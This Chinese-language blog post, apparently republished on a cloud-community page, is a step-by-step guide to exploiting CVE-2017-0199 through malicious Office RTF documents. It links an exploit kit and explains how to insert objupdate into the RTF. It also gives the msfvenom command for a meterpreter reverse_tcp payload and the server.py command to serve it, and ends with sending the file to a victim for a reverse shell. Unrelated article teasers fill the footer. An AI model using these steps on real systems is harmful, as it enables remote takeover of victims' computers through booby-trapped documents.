CVE-2017-0199:Microsoft Office RTF 漏洞利用指南

CVE-2017-0199:Microsoft Office RTF

漏洞利用指南

From ChaMd5安全团队核心成员 zusheng

一、介绍

FireEye最近检测到利用CVE-2017-0199安全漏洞的恶意Microsoft Office RTF文档,要知道CVE-2017-0199可是此前尚未公开的漏洞。当用户打开包含该漏洞利用代码的文档时,恶意代码就会下载并执行包含PowerShell命令的Visual Basic脚本。 FireEye已经发现了一些通过CVE-2017-0199漏洞下载并执行各种臭名昭著的恶意软件系列的有效载荷的Office文档。

二、攻击场景

攻击的具体方式如下所示:

1. 攻击者通过电子邮件向目标用户发送含有OLE2嵌入式链接对象的Microsoft Word文档。

2. 当用户打开文档时,winword.exe将会向远程服务器发出HTTP请求,以索取恶意HTA文件。

3. 服务器返回的文件是一个带有嵌入式恶意脚本的假RTF文件。

4. Winword.exe通过COM对象查找application / hta的文件处理程序,从而导致Microsoft HTA应用程序(mshta.exe)加载并执行恶意脚本。

三、漏洞利用细节

准备工作:

下载漏洞利用工具包CVE-2017-0199 - v2.0:

https://github.com/haibara3839/CVE-2017-0199-master

漏洞利用工具包CVE-2017-0199 - v2.0是一个非常方便的Python脚本,它可以非常快速有效的利用Microsoft Office RTF漏洞,无需任何复杂的配置。

将innocent.doc和server.py两个文件放置在攻击机上并开启Apache服务

漏洞利用步骤一:制作恶意RTF文件

新建一个Word文档按照下图进行配置

另存为RTF格式

使用文本编辑器软件打开test.rtf文件,在文件中查找objupdate,然后在objautlink后面插入objupdate

漏洞利用步骤二:配置攻击机

使用msfvenom生成反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.104 LPORT=4444 -f exe > shell.exe

运行server.py服务

python server.py 80 http://10.10.10.104/shell.exe /var/www/html/shell.exe

漏洞利用步骤三:攻击完成

将恶意文件test.rtf发给受害者,受害者打开test.rtf

弹出警告框,成功反弹shell

弹弹弹

原文发布于微信公众号 - ChaMd5安全团队(chamd5sec)

原文发表时间:2017-04-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏DeveWork

Sublime text 3 中Package Control 的安装与使用方法

Package Control插件本身是一个为了方便管理插件的插件,在Sublime text 3中,Package Control 的安装方法一开始出来的方法...

7288
来自专栏腾讯移动品质中心TMQ的专栏

让你相见恨晚的android权限业务实践

在上一篇Android权限中,我们介绍了一些权限相关的知识,也简述了新的Android M带来的权限变化,我们如何应对这种变化?是摆着我们面前的紧要问题。 现在...

2859
来自专栏我思故我在

MongoDB - 在Windows上安装

3429
来自专栏bboysoul

git设置socks代理

终端下执行 git config --global http.proxy 'socks5://127.0.0.1:1080' git config --gl...

1654
来自专栏ASP.NETCore

微软为.NET程序员带来了最优的跨平台开发体验-WSL

在前几个Visual Studio Code更新中发现有一个重要得特性,就是nodejs可以使用VS Code在WSL中进行Debug了(WSL是指Win10中...

1194
来自专栏deepcc

Sublime Text 3 入门(插件控制台安装)

53011
来自专栏ASP.NETCore

细说ASP.NET Core静态文件的缓存方式

  我们在优化Web服务的时候,对于静态的资源文件,通常都是通过客户端缓存、服务器缓存、CDN缓存,这三种方式来缓解客户端对于Web服务器的连接请求压力的。

2142
来自专栏林德熙的博客

dotnet core 通过修改文件头的方式隐藏控制台窗口

在带界面的 dotnet core 程序运行的时候就会出现一个控制台窗口,本文告诉大家使用最简单方法去隐藏控制台窗口。

1061
来自专栏张善友的专栏

使用IAPIExplorer列举ASP.NET Web API

IApiExplorer是一个新的抽象层,它可以帮助获取ASP.NET Web API的结构描述。伴随该接口的还有一个默认实现——APIExplorer。 使用...

1866
来自专栏程序你好

ASP.NET Core MVC 概述

1382

扫码关注云+社区

领取腾讯云代金券